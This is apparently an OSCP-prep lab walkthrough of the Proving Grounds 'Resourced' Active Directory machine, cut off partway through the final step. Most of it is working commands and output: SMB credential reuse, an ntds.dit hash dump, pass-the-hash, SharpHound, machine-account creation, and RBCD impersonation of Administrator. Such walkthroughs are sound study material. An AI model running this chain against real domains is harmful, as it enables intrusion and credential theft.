--- title: '[OSCP, PEN-200] Proving Grounds Practice - Active Directory' disqus: hackmd --- [OSCP, PEN-200] Proving Grounds Practice - Active Directory === # Table of Contents [TOC] # Resourced  ## Solution ### 1. Recon #### 1.1 Nmap ``` ┌──(chw㉿CHW)-[~/Resourced] └─$ nmap -sC -sV -p- 192.168.122.175 Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-24 23:33 EDT Nmap scan report for 192.168.122.175 Host is up (0.091s latency). Not shown: 65515 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-03-25 03:37:51Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: resourced.local0., Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: resourced.local0., Site: Default-First-Site-Name) 3269/tcp open tcpwrapped 3389/tcp open ms-wbt-server Microsoft Terminal Services | rdp-ntlm-info: | Target_Name: resourced | NetBIOS_Domain_Name: resourced | NetBIOS_Computer_Name: RESOURCEDC | DNS_Domain_Name: resourced.local | DNS_Computer_Name: ResourceDC.resourced.local | DNS_Tree_Name: resourced.local | Product_Version: 10.0.17763 |_ System_Time: 2025-03-25T03:38:41+00:00 |_ssl-date: 2025-03-25T03:39:20+00:00; 0s from scanner time. | ssl-cert: Subject: commonName=ResourceDC.resourced.local | Not valid before: 2025-03-24T03:32:50 |_Not valid after: 2025-09-23T03:32:50 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 9389/tcp open mc-nmf .NET Message Framing 49666/tcp open msrpc Microsoft Windows RPC 49668/tcp open msrpc Microsoft Windows RPC 49674/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 49675/tcp open msrpc Microsoft Windows RPC 49693/tcp open msrpc Microsoft Windows RPC 49708/tcp open msrpc Microsoft Windows RPC Service Info: Host: RESOURCEDC; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | smb2-security-mode: | 3:1:1: |_ Message signing enabled and required | smb2-time: | date: 2025-03-25T03:38:41 |_ start_date: N/A Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 345.10 seconds ``` > DNS, kerberos, SMB, WinRM, kpasswd5, Ldap, RPC #### 1.2 SMB ``` ┌──(chw㉿CHW)-[~/Resourced] └─$ enum4linux -a 192.168.122.175 ... ==========================( Enumerating Workgroup/Domain on 192.168.122.175 )========================== [E] Can't find workgroup/domain ... ===============================( Getting domain SID for 192.168.122.175 )=============================== Domain Name: resourced Domain Sid: S-1-5-21-537427935-490066102-1511301751 ... ======================================( Users on 192.168.122.175 )====================================== index: 0xeda RID: 0x1f4 acb: 0x00000210 Account: Administrator Name: (null) Desc: Built-in account for administering the computer/domain index: 0xf72 RID: 0x457 acb: 0x00020010 Account: D.Durant Name: (null) Desc: Linear Algebra and crypto god index: 0xf73 RID: 0x458 acb: 0x00020010 Account: G.Goldberg Name: (null) Desc: Blockchain expert index: 0xedb RID: 0x1f5 acb: 0x00000215 Account: Guest Name: (null) Desc: Built-in account for guest access to the computer/domain index: 0xf6d RID: 0x452 acb: 0x00020010 Account: J.Johnson Name: (null) Desc: Networking specialist index: 0xf6b RID: 0x450 acb: 0x00020010 Account: K.Keen Name: (null) Desc: Frontend Developer index: 0xf10 RID: 0x1f6 acb: 0x00020011 Account: krbtgt Name: (null) Desc: Key Distribution Center Service Account index: 0xf6c RID: 0x451 acb: 0x00000210 Account: L.Livingstone Name: (null) Desc: SysAdmin index: 0xf6a RID: 0x44f acb: 0x00020010 Account: M.Mason Name: (null) Desc: Ex IT admin index: 0xf70 RID: 0x455 acb: 0x00020010 Account: P.Parker Name: (null) Desc: Backend Developer index: 0xf71 RID: 0x456 acb: 0x00020010 Account: R.Robinson Name: (null) Desc: Database Admin index: 0xf6f RID: 0x454 acb: 0x00020010 Account: S.Swanson Name: (null) Desc: Military Vet now cybersecurity specialist index: 0xf6e RID: 0x453 acb: 0x00000210 Account: V.Ventz Name: (null) Desc: New-hired, reminder: HotelCalifornia194! user:[Administrator] rid:[0x1f4] user:[Guest] rid:[0x1f5] user:[krbtgt] rid:[0x1f6] user:[M.Mason] rid:[0x44f] user:[K.Keen] rid:[0x450] user:[L.Livingstone] rid:[0x451] user:[J.Johnson] rid:[0x452] user:[V.Ventz] rid:[0x453] user:[S.Swanson] rid:[0x454] user:[P.Parker] rid:[0x455] user:[R.Robinson] rid:[0x456] user:[D.Durant] rid:[0x457] user:[G.Goldberg] rid:[0x458] ==========================( Password Policy Information for 192.168.122.175 )========================== [+] Attaching to 192.168.122.175 using a NULL share [+] Trying protocol 139/SMB... [!] Protocol failed: Cannot request session (Called Name:192.168.122.175) [+] Trying protocol 445/SMB... [+] Found domain(s): [+] resourced [+] Builtin [+] Password Info for Domain: resourced [+] Minimum password length: 7 [+] Password history length: 24 [+] Maximum password age: 41 days 23 hours 53 minutes [+] Password Complexity Flags: 000001 [+] Domain Refuse Password Change: 0 [+] Domain Password Store Cleartext: 0 [+] Domain Password Lockout Admins: 0 [+] Domain Password No Clear Change: 0 [+] Domain Password No Anon Change: 0 [+] Domain Password Complex: 1 [+] Minimum password age: 1 day 4 minutes [+] Reset Account Lockout Counter: 30 minutes [+] Locked Account Duration: 30 minutes [+] Account Lockout Threshold: None [+] Forced Log off Time: Not Set [+] Retieved partial password policy with rpcclient: Password Complexity: Enabled Minimum Password Length: 7 =====================================( Groups on 192.168.122.175 )===================================== [+] Getting builtin groups: group:[Server Operators] rid:[0x225] group:[Account Operators] rid:[0x224] group:[Pre-Windows 2000 Compatible Access] rid:[0x22a] group:[Incoming Forest Trust Builders] rid:[0x22d] group:[Windows Authorization Access Group] rid:[0x230] group:[Terminal Server License Servers] rid:[0x231] group:[Administrators] rid:[0x220] group:[Users] rid:[0x221] group:[Guests] rid:[0x222] group:[Print Operators] rid:[0x226] group:[Backup Operators] rid:[0x227] group:[Replicator] rid:[0x228] group:[Remote Desktop Users] rid:[0x22b] group:[Network Configuration Operators] rid:[0x22c] group:[Performance Monitor Users] rid:[0x22e] group:[Performance Log Users] rid:[0x22f] group:[Distributed COM Users] rid:[0x232] group:[IIS_IUSRS] rid:[0x238] group:[Cryptographic Operators] rid:[0x239] group:[Event Log Readers] rid:[0x23d] group:[Certificate Service DCOM Access] rid:[0x23e] group:[RDS Remote Access Servers] rid:[0x23f] group:[RDS Endpoint Servers] rid:[0x240] group:[RDS Management Servers] rid:[0x241] group:[Hyper-V Administrators] rid:[0x242] group:[Access Control Assistance Operators] rid:[0x243] group:[Remote Management Users] rid:[0x244] group:[Storage Replica Administrators] rid:[0x246] [+] Getting builtin group memberships: Group: IIS_IUSRS' (RID: 568) has member: Couldn't lookup SIDs Group: Administrators' (RID: 544) has member: Couldn't lookup SIDs Group: Users' (RID: 545) has member: Couldn't lookup SIDs Group: Remote Desktop Users' (RID: 555) has member: Couldn't lookup SIDs Group: Remote Management Users' (RID: 580) has member: Couldn't lookup SIDs Group: Guests' (RID: 546) has member: Couldn't lookup SIDs Group: Windows Authorization Access Group' (RID: 560) has member: Couldn't lookup SIDs Group: Pre-Windows 2000 Compatible Access' (RID: 554) has member: Couldn't lookup SIDs [+] Getting local groups: group:[Cert Publishers] rid:[0x205] group:[RAS and IAS Servers] rid:[0x229] group:[Allowed RODC Password Replication Group] rid:[0x23b] group:[Denied RODC Password Replication Group] rid:[0x23c] group:[DnsAdmins] rid:[0x44d] [+] Getting local group memberships: Group: Denied RODC Password Replication Group' (RID: 572) has member: Couldn't lookup SIDs [+] Getting domain groups: group:[Enterprise Read-only Domain Controllers] rid:[0x1f2] group:[Domain Admins] rid:[0x200] group:[Domain Users] rid:[0x201] group:[Domain Guests] rid:[0x202] group:[Domain Computers] rid:[0x203] group:[Domain Controllers] rid:[0x204] group:[Schema Admins] rid:[0x206] group:[Enterprise Admins] rid:[0x207] group:[Group Policy Creator Owners] rid:[0x208] group:[Read-only Domain Controllers] rid:[0x209] group:[Cloneable Domain Controllers] rid:[0x20a] group:[Protected Users] rid:[0x20d] group:[Key Admins] rid:[0x20e] group:[Enterprise Key Admins] rid:[0x20f] group:[DnsUpdateProxy] rid:[0x44e] [+] Getting domain group memberships: Group: 'Group Policy Creator Owners' (RID: 520) has member: resourced\Administrator Group: 'Domain Guests' (RID: 514) has member: resourced\Guest Group: 'Domain Admins' (RID: 512) has member: resourced\Administrator Group: 'Schema Admins' (RID: 518) has member: resourced\Administrator Group: 'Domain Users' (RID: 513) has member: resourced\Administrator Group: 'Domain Users' (RID: 513) has member: resourced\krbtgt Group: 'Domain Users' (RID: 513) has member: resourced\M.Mason Group: 'Domain Users' (RID: 513) has member: resourced\K.Keen Group: 'Domain Users' (RID: 513) has member: resourced\L.Livingstone Group: 'Domain Users' (RID: 513) has member: resourced\J.Johnson Group: 'Domain Users' (RID: 513) has member: resourced\V.Ventz Group: 'Domain Users' (RID: 513) has member: resourced\S.Swanson Group: 'Domain Users' (RID: 513) has member: resourced\P.Parker Group: 'Domain Users' (RID: 513) has member: resourced\R.Robinson Group: 'Domain Users' (RID: 513) has member: resourced\D.Durant Group: 'Domain Users' (RID: 513) has member: resourced\G.Goldberg Group: 'Enterprise Admins' (RID: 519) has member: resourced\Administrator Group: 'Domain Controllers' (RID: 516) has member: resourced\RESOURCEDC$ ``` > 1. Domain Name: resourced > 2. User 建立 `ADuesr.txt` > 3. `V.Ventz` 疑似密碼：`HotelCalifornia194!` 使用 `V.Ventz:HotelCalifornia194!` 查看 SMB ``` ┌──(chw㉿CHW)-[~/Resourced] └─$ crackmapexec smb 192.168.122.175 -u 'V.Ventz' -p 'HotelCalifornia194!' --shares SMB 192.168.122.175 445 RESOURCEDC [*] Windows 10 / Server 2019 Build 17763 x64 (name:RESOURCEDC) (domain:resourced.local) (signing:True) (SMBv1:False) SMB 192.168.122.175 445 RESOURCEDC [+] resourced.local\V.Ventz:HotelCalifornia194! SMB 192.168.122.175 445 RESOURCEDC [+] Enumerated shares SMB 192.168.122.175 445 RESOURCEDC Share Permissions Remark SMB 192.168.122.175 445 RESOURCEDC ----- ----------- ------ SMB 192.168.122.175 445 RESOURCEDC ADMIN$ Remote Admin SMB 192.168.122.175 445 RESOURCEDC C$ Default share SMB 192.168.122.175 445 RESOURCEDC IPC$ READ Remote IPC SMB 192.168.122.175 445 RESOURCEDC NETLOGON READ Logon server share SMB 192.168.122.175 445 RESOURCEDC Password Audit READ SMB 192.168.122.175 445 RESOURCEDC SYSVOL READ Logon server share ``` 下載到本機 ``` ┌──(chw㉿CHW)-[~/Resourced/SMB_Ventz] └─$ smbclient //192.168.122.175/'Password Audit' -U 'V.Ventz' -c "recurse ON; prompt OFF; mget *" Password for [WORKGROUP\V.Ventz]: getting file \Active Directory\ntds.dit of size 25165824 as Active Directory/ntds.dit (2213.7 KiloBytes/sec) (average 2213.7 KiloBytes/sec) ... ┌──(chw㉿CHW)-[~/Resourced/SMB_Ventz] └─$ smbclient //192.168.122.175/NETLOGON -U 'V.Ventz' -c "recurse ON; prompt OFF; mget *" ┌──(chw㉿CHW)-[~/Resourced/SMB_Ventz] └─$ smbclient //192.168.122.175/SYSVOL -U 'V.Ventz' -c "recurse ON; prompt OFF; mget *" Password for [WORKGROUP\V.Ventz]: NT_STATUS_ACCESS_DENIED listing \resourced.local\DfsrPrivate\* ... ┌──(chw㉿CHW)-[~/Resourced/SMB_Ventz] └─$ tree . ├── Paaaword Audit │   ├── Active Directory │   │   ├── ntds.dit │   │   └── ntds.jfm │   └── registry │   ├── SECURITY │   └── SYSTEM └── SYSVOL └── resourced.local ├── DfsrPrivate ├── Policies │   ├── {31B2F340-016D-11D2-945F-00C04FB984F9} │   │   ├── GPT.INI │   │   ├── MACHINE │   │   │   ├── Microsoft │   │   │   │   └── Windows NT │   │   │   │   └── SecEdit │   │   │   │   └── GptTmpl.inf │   │   │   └── Registry.pol │   │   └── USER │   └── {6AC1786C-016F-11D2-945F-00C04fB984F9} │   ├── GPT.INI │   ├── MACHINE │   │   └── Microsoft │   │   └── Windows NT │   │   └── SecEdit │   │   └── GptTmpl.inf │   └── USER └── scripts 21 directories, 9 files ``` > `NETLOGON` 是空的\ > 手動查看檔案 > > `Paaaword Audit/Active Directory/ntds.dit` 與 `Password Audit/registry/SYSTEM` 可以爆破 AD 使用者密碼 ### 2. `ntds.dit`+ `SYSTEM` 爆破 AD User ``` ┌──(chw㉿CHW)-[~/Resourced/SMB_Ventz/Paaaword Audit] └─$ impacket-secretsdump -ntds "Active Directory/ntds.dit" -system registry/SYSTEM LOCAL Impacket v0.12.0.dev1 - Copyright 2023 Fortra [*] Target system bootKey: 0x6f961da31c7ffaf16683f78e04c3e03d [*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash) [*] Searching for pekList, be patient [*] PEK # 0 found and decrypted: 9298735ba0d788c4fc05528650553f94 [*] Reading and decrypting hashes from Active Directory/ntds.dit Administrator:500:aad3b435b51404eeaad3b435b51404ee:12579b1666d4ac10f0f59f300776495f::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: RESOURCEDC$:1000:aad3b435b51404eeaad3b435b51404ee:9ddb6f4d9d01fedeb4bccfb09df1b39d::: krbtgt:502:aad3b435b51404eeaad3b435b51404ee:3004b16f88664fbebfcb9ed272b0565b::: M.Mason:1103:aad3b435b51404eeaad3b435b51404ee:3105e0f6af52aba8e11d19f27e487e45::: K.Keen:1104:aad3b435b51404eeaad3b435b51404ee:204410cc5a7147cd52a04ddae6754b0c::: L.Livingstone:1105:aad3b435b51404eeaad3b435b51404ee:19a3a7550ce8c505c2d46b5e39d6f808::: J.Johnson:1106:aad3b435b51404eeaad3b435b51404ee:3e028552b946cc4f282b72879f63b726::: V.Ventz:1107:aad3b435b51404eeaad3b435b51404ee:913c144caea1c0a936fd1ccb46929d3c::: S.Swanson:1108:aad3b435b51404eeaad3b435b51404ee:bd7c11a9021d2708eda561984f3c8939::: P.Parker:1109:aad3b435b51404eeaad3b435b51404ee:980910b8fc2e4fe9d482123301dd19fe::: R.Robinson:1110:aad3b435b51404eeaad3b435b51404ee:fea5a148c14cf51590456b2102b29fac::: D.Durant:1111:aad3b435b51404eeaad3b435b51404ee:08aca8ed17a9eec9fac4acdcb4652c35::: G.Goldberg:1112:aad3b435b51404eeaad3b435b51404ee:62e16d17c3015c47b4d513e65ca757a2::: [*] Kerberos keys from Active Directory/ntds.dit Administrator:aes256-cts-hmac-sha1-96:73410f03554a21fb0421376de7f01d5fe401b8735d4aa9d480ac1c1cdd9dc0c8 Administrator:aes128-cts-hmac-sha1-96:b4fc11e40a842fff6825e93952630ba2 Administrator:des-cbc-md5:80861f1a80f1232f RESOURCEDC$:aes256-cts-hmac-sha1-96:b97344a63d83f985698a420055aa8ab4194e3bef27b17a8f79c25d18a308b2a4 RESOURCEDC$:aes128-cts-hmac-sha1-96:27ea2c704e75c6d786cf7e8ca90e0a6a RESOURCEDC$:des-cbc-md5:ab089e317a161cc1 krbtgt:aes256-cts-hmac-sha1-96:12b5d40410eb374b6b839ba6b59382cfbe2f66bd2e238c18d4fb409f4a8ac7c5 krbtgt:aes128-cts-hmac-sha1-96:3165b2a56efb5730cfd34f2df472631a krbtgt:des-cbc-md5:f1b602194f3713f8 M.Mason:aes256-cts-hmac-sha1-96:21e5d6f67736d60430facb0d2d93c8f1ab02da0a4d4fe95cf51554422606cb04 M.Mason:aes128-cts-hmac-sha1-96:99d5ca7207ce4c406c811194890785b9 M.Mason:des-cbc-md5:268501b50e0bf47c K.Keen:aes256-cts-hmac-sha1-96:9a6230a64b4fe7ca8cfd29f46d1e4e3484240859cfacd7f67310b40b8c43eb6f K.Keen:aes128-cts-hmac-sha1-96:e767891c7f02fdf7c1d938b7835b0115 K.Keen:des-cbc-md5:572cce13b38ce6da L.Livingstone:aes256-cts-hmac-sha1-96:cd8a547ac158c0116575b0b5e88c10aac57b1a2d42e2ae330669a89417db9e8f L.Livingstone:aes128-cts-hmac-sha1-96:1dec73e935e57e4f431ac9010d7ce6f6 L.Livingstone:des-cbc-md5:bf01fb23d0e6d0ab J.Johnson:aes256-cts-hmac-sha1-96:0452f421573ac15a0f23ade5ca0d6eada06ae85f0b7eb27fe54596e887c41bd6 J.Johnson:aes128-cts-hmac-sha1-96:c438ef912271dbbfc83ea65d6f5fb087 J.Johnson:des-cbc-md5:ea01d3d69d7c57f4 V.Ventz:aes256-cts-hmac-sha1-96:4951bb2bfbb0ffad425d4de2353307aa680ae05d7b22c3574c221da2cfb6d28c V.Ventz:aes128-cts-hmac-sha1-96:ea815fe7c1112385423668bb17d3f51d V.Ventz:des-cbc-md5:4af77a3d1cf7c480 S.Swanson:aes256-cts-hmac-sha1-96:8a5d49e4bfdb26b6fb1186ccc80950d01d51e11d3c2cda1635a0d3321efb0085 S.Swanson:aes128-cts-hmac-sha1-96:6c5699aaa888eb4ec2bf1f4b1d25ec4a S.Swanson:des-cbc-md5:5d37583eae1f2f34 P.Parker:aes256-cts-hmac-sha1-96:e548797e7c4249ff38f5498771f6914ae54cf54ec8c69366d353ca8aaddd97cb P.Parker:aes128-cts-hmac-sha1-96:e71c552013df33c9e42deb6e375f6230 P.Parker:des-cbc-md5:083b37079dcd764f R.Robinson:aes256-cts-hmac-sha1-96:90ad0b9283a3661176121b6bf2424f7e2894079edcc13121fa0292ec5d3ddb5b R.Robinson:aes128-cts-hmac-sha1-96:2210ad6b5ae14ce898cebd7f004d0bef R.Robinson:des-cbc-md5:7051d568dfd0852f D.Durant:aes256-cts-hmac-sha1-96:a105c3d5cc97fdc0551ea49fdadc281b733b3033300f4b518f965d9e9857f27a D.Durant:aes128-cts-hmac-sha1-96:8a2b701764d6fdab7ca599cb455baea3 D.Durant:des-cbc-md5:376119bfcea815f8 G.Goldberg:aes256-cts-hmac-sha1-96:0d6ac3733668c6c0a2b32a3d10561b2fe790dab2c9085a12cf74c7be5aad9a91 G.Goldberg:aes128-cts-hmac-sha1-96:00f4d3e907818ce4ebe3e790d3e59bf7 G.Goldberg:des-cbc-md5:3e20fd1a25687673 [*] Cleaning up... ``` > 將 `username:RID:LM hash:NT hash:::` 改成 `NT hash`儲存成 ADUser.hash ### 3. John 爆破 ``` ┌──(chw㉿CHW)-[~/Resourced] └─$ cat ADUser.hash 12579b1666d4ac10f0f59f300776495f 31d6cfe0d16ae931b73c59d7e0c089c0 9ddb6f4d9d01fedeb4bccfb09df1b39d 3004b16f88664fbebfcb9ed272b0565b 3105e0f6af52aba8e11d19f27e487e45 204410cc5a7147cd52a04ddae6754b0c 19a3a7550ce8c505c2d46b5e39d6f808 3e028552b946cc4f282b72879f63b726 913c144caea1c0a936fd1ccb46929d3c bd7c11a9021d2708eda561984f3c8939 980910b8fc2e4fe9d482123301dd19fe fea5a148c14cf51590456b2102b29fac 08aca8ed17a9eec9fac4acdcb4652c35 62e16d17c3015c47b4d513e65ca757a2 ┌──(chw㉿CHW)-[~/Resourced] └─$ john --wordlist=/usr/share/wordlists/rockyou.txt --format=NT ADUser.hash Using default input encoding: UTF-8 Loaded 14 password hashes with no different salts (NT [MD4 128/128 ASIMD 4x2]) Remaining 13 password hashes with no different salts Warning: no OpenMP support for this hash type, consider --fork=4 Press 'q' or Ctrl-C to abort, almost any other key for status 0g 0:00:00:00 DONE (2025-03-25 02:22) 0g/s 15762Kp/s 15762Kc/s 204909KC/s "amo-te"..*7¡Vamos! Session completed. ``` ### 4. crackmapexec winrm (Pass-the-Hash) crackmapexec 讀不了整個 ADUser.txt，只能逐一嘗試 ``` ┌──(chw㉿CHW)-[~/Resourced] └─$ crackmapexec winrm 192.168.122.175 -u Administrator -H ADUser.hash SMB 192.168.122.175 5985 RESOURCEDC [*] Windows 10 / Server 2019 Build 17763 (name:RESOURCEDC) (domain:resourced.local) HTTP 192.168.122.175 5985 RESOURCEDC [*] http://192.168.122.175:5985/wsman WINRM 192.168.122.175 5985 RESOURCEDC [-] resourced.local\Administrator:12579b1666d4ac10f0f59f300776495f ... ┌──(chw㉿CHW)-[~/Resourced] └─$ crackmapexec winrm 192.168.122.175 -u M.Mason -H ADUser.hash ┌──(chw㉿CHW)-[~/Resourced] └─$ crackmapexec winrm 192.168.122.175 -u K.Keen -H ADUser.hash ┌──(chw㉿CHW)-[~/Resourced] └─$ crackmapexec winrm 192.168.122.175 -u L.Livingstone -H ADUser.hash SMB 192.168.122.175 5985 RESOURCEDC [*] Windows 10 / Server 2019 Build 17763 (name:RESOURCEDC) (domain:resourced.local) HTTP 192.168.122.175 5985 RESOURCEDC [*] http://192.168.122.175:5985/wsman WINRM 192.168.122.175 5985 RESOURCEDC [-] resourced.local\L.Livingstone:12579b1666d4ac10f0f59f300776495f WINRM 192.168.122.175 5985 RESOURCEDC [-] resourced.local\L.Livingstone:31d6cfe0d16ae931b73c59d7e0c089c0 WINRM 192.168.122.175 5985 RESOURCEDC [-] resourced.local\L.Livingstone:9ddb6f4d9d01fedeb4bccfb09df1b39d WINRM 192.168.122.175 5985 RESOURCEDC [-] resourced.local\L.Livingstone:3004b16f88664fbebfcb9ed272b0565b WINRM 192.168.122.175 5985 RESOURCEDC [-] resourced.local\L.Livingstone:3105e0f6af52aba8e11d19f27e487e45 WINRM 192.168.122.175 5985 RESOURCEDC [-] resourced.local\L.Livingstone:204410cc5a7147cd52a04ddae6754b0c WINRM 192.168.122.175 5985 RESOURCEDC [+] resourced.local\L.Livingstone:19a3a7550ce8c505c2d46b5e39d6f808 (Pwn3d!) ``` >`resourced.local\L.Livingstone:19a3a7550ce8c505c2d46b5e39d6f808` ### 5. Evil-winrm ``` ┌──(chw㉿CHW)-[~/Resourced] └─$ evil-winrm -i 192.168.122.175 -u L.Livingstone -H 19a3a7550ce8c505c2d46b5e39d6f808 Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\L.Livingstone\Documents> hostname ResourceDC *Evil-WinRM* PS C:\Users\L.Livingstone\Documents> whoami /priv PRIVILEGES INFORMATION ---------------------- Privilege Name Description State ============================= ============================== ======= SeMachineAccountPrivilege Add workstations to domain Enabled SeChangeNotifyPrivilege Bypass traverse checking Enabled SeIncreaseWorkingSetPrivilege Increase a process working set Enabled ``` > 不是 Local Admin 也不是 Domain admin ### ✅ Get User Flag > 在 `C:\Users\L.Livingstone\Desktop` 找到 User flag ## Privileges Escalation ### 6. BloodHound #### 6.1 上傳並執行 SharpHound ``` ┌──(chw㉿CHW)-[~/Resourced] └─$ cp /usr/lib/bloodhound/resources/app/Collectors/SharpHound.ps1 . ``` ``` *Evil-WinRM* PS C:\Users\L.Livingstone\Documents> upload /home/chw/Resourced/SharpHound.ps1 Info: Uploading /home/chw/Resourced/SharpHound.ps1 to C:\Users\L.Livingstone\Documents\SharpHound.ps1 Data: 1744464 bytes of 1744464 bytes copied Info: Upload successful! *Evil-WinRM* PS C:\Users\L.Livingstone\Documents> powershell -ep bypass Windows PowerShell Copyright (C) Microsoft Corporation. All rights reserved. PS C:\Users\L.Livingstone\Documents> *Evil-WinRM* PS C:\Users\L.Livingstone\Documents> . .\SharpHound.ps1 *Evil-WinRM* PS C:\Users\L.Livingstone\Documents> Invoke-BloodHound -CollectionMethod All -OutputDirectory "C:\Users\L.Livingstone\Documents" *Evil-WinRM* PS C:\Users\L.Livingstone\Documents> ls Directory: C:\Users\L.Livingstone\Documents Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 3/24/2025 11:54 PM 11760 20250324235440_BloodHound.zip -a---- 3/24/2025 11:54 PM 8964 N2NkZDYyMzItY2UxZi00N2ZkLTg4ZmQtNThlNjJlZDQ1NzJh.bin -a---- 3/24/2025 11:50 PM 1308348 SharpHound.ps1 ``` #### 6.2 下載結果分析 ``` *Evil-WinRM* PS C:\Users\L.Livingstone\Documents> download 20250324235440_BloodHound.zip Info: Downloading C:\Users\L.Livingstone\Documents\20250324235440_BloodHound.zip to 20250324235440_BloodHound.zip Info: Download successful! ``` Upload 到 BloodHound ``` MATCH (u:User) RETURN u ``` 標記 `L.Livingstone` "Marked User As Owned"\   > 對 DC具有 GenericAll 存取權。但目前沒有 local admin，也嘗試 Windows 提權不可行。 ### 7. 創建受信任的 computer ``` ┌──(chw㉿CHW)-[~/Resourced] └─$ impacket-addcomputer resourced.local/l.livingstone -dc-ip 192.168.122.175 -hashes :19a3a7550ce8c505c2d46b5e39d6f808 -computer-name 'chw' -computer-pass 'chw' Impacket v0.12.0.dev1 - Copyright 2023 Fortra [*] Successfully added machine account chw$ with password chw. ``` >`impacket-addcomputer`:Impacket 套件中的工具，用來把一個新機器加入 AD\ `resourced.local/l.livingstone`: 指定網域與 username\ `-dc-ip 192.168.122.175`: 指定網域控制器（Domain Controller, DC）的 IP\ `-hashes :19a3a7550ce8c505c2d46b5e39d6f808`: 提供使用者的 NTLM hash（空 LM hash + NT hash）作為身份驗證方式（不需要密碼）\ `-computer-name 'chw'`:新增的機器帳號名稱，實際上會建立 `chw$`\ `-computer-pass 'chw'`:指定這個新機器帳號的密碼，也可用於後續攻擊 在 Evil-WinRM 就能存取新增的機器 ``` *Evil-WinRM* PS C:\Users\L.Livingstone\Documents> Get-ADcomputer chw DistinguishedName : CN=chw,CN=Computers,DC=resourced,DC=local DNSHostName : Enabled : True Name : chw ObjectClass : computer ObjectGUID : 7995573d-8ff5-4865-9ad8-bfc65f318b71 SamAccountName : chw$ SID : S-1-5-21-537427935-490066102-1511301751-4101 UserPrincipalName : ``` ### 8. Resource-Based Constrained Delegation (RBCD) >[!Note] >🧠 什麼是 RBCD？\ Resource-Based Constrained Delegation 是 AD 的一項機制，允許電腦帳號 A 被授權在目標電腦 B 上，以其他使用者的身分執行操作。這種授權是由資源端（目標電腦）控制的，不是由帳號本身控制。 從一般網域帳號 l.livingstone 提權成 Domain Controller 上的 SYSTEM 權限 #### 8.1 設定 RBCD 權限 ``` ┌──(chw㉿CHW)-[~/Resourced] └─$ sudo python3 /home/chw/Tools/impacket/rbcd.py -dc-ip 192.168.122.175 -t RESOURCEDC -f 'chw' -hashes :19a3a7550ce8c505c2d46b5e39d6f808 resourced.local\\l.livingstone Impacket v0.12.0.dev1 - Copyright 2023 Fortra [*] Starting Resource Based Constrained Delegation Attack against RESOURCEDC$ [*] Initializing LDAP connection to 192.168.122.175 [*] Using resourced.local\l.livingstone account with password *** [*] LDAP bind OK [*] Initializing domainDumper() [*] Initializing LDAPAttack() [*] Writing SECURITY_DESCRIPTOR related to (fake) computer `chw` into msDS-AllowedToActOnBehalfOfOtherIdentity of target computer `RESOURCEDC` [*] Delegation rights modified succesfully! [*] chw$ can now impersonate users on RESOURCEDC$ via S4U2Proxy ``` > `-dc-ip 192.168.122.175`: 指定 Domain Controller 的 IP\ `-t RESOURCEDC`: 指定目標主機（被寫入 RBCD 權限的機器）\ `-f 'chw'` 提供用來修改 RBCD 權限的帳號（chw）\ `-hashes :19a3a7550ce8c505c2d46b5e39d6f808`:指定帳號的 NTLM hash，格式為 LMHASH:NTHASH（這裡 LM 為空） `resourced.local\\l.livingstone`: 被寫入權限的目標（SPN 所屬主體） > > 剛新增的機器帳號 chw$ 的安全描述符 (security descriptor)，寫入目標機器 RESOURCEDC 的 msDS-AllowedToActOnBehalfOfOtherIdentity 屬性中\ > > 所以可以用 chw 這個帳號（透過其 hash 認證）連線到 DC，並修改 RESOURCEDC 這台電腦帳號的 RBCD 權限，讓 resourced.local\l.livingstone 這個帳號可以被它模擬。 #### 8.2 假冒 Administrator 拿 TGS (S4U2Proxy) 從 AD 中請求 Service Ticket (ST)，並偽造（impersonate）Administrator 的身分 ``` ┌──(chw㉿CHW)-[~/Resourced] └─$ impacket-getST -spn cifs/resourcedc.resourced.local resourced.local/chw\$:'chw' -impersonate Administrator -dc-ip 192.168.122.175 Impacket v0.12.0.dev1 - Copyright 2023 Fortra [-] CCache file is not found. Skipping... [*] Getting TGT for user [*] Impersonating Administrator [*] Requesting S4U2self [*] Requesting S4U2Proxy [*] Saving ticket in Administrator@cifs_resourcedc.resourced.local@RESOURCED.LOCAL.ccache ``` > `-spn cifs/resourcedc.resourced.local`: 目標服務的 SPN（這裡是 RESOURCEDC 的 SMB/CIFS）\ `resourced.local/chw\$:'chw'`: 模擬帳號的身份與密碼\ `-impersonate Administrator`: 要偽造的目標使用者身分\ `-dc-ip 192.168.122.175 `: Domain Controller IP >>用你自己創的機器帳號 chw$ 登入（這個帳號現在可以 impersonate）\ 指定 -impersonate Administrator，請求一張能代表 Administrator 的 TGS，目標服務是 `cifs/resourcedc.resourced.local`。 #### 8.4 設定 `/etc/hosts` Kerberos TGS 跟 SPN 都要靠正確的 FQDN ``` ┌──(chw㉿CHW)-[~/Resourced] └─$ sudo sh -c 'echo "192.168.122.175 resourcedc.resourced.local" >> /etc/hosts' ``` #### 8.5 使用 PSEXEC 使用這張 TGS 登入 SYSTEM shell 使用 impacket-psexec 工具，透過 Kerberos ticket（ccache），以 Administrator 的身分遠端執行命令（取得 shell） ``` ┌──(chw㉿CHW)-[~/Resourced] └─$ sudo KRB5CCNAME=Administrator@cifs_resourcedc.resourced.local@RESOURCED.LOCAL.ccache impacket-psexec -k -no-pass resourced.local/Administrator@resourcedc.resourced.local -dc-ip 192.168.122.175 Impacket v0.12.0.dev1 - Copyright 2023 Fortra [*] Requesting shares on resourcedc.resourced.local..... [*] Found writable share 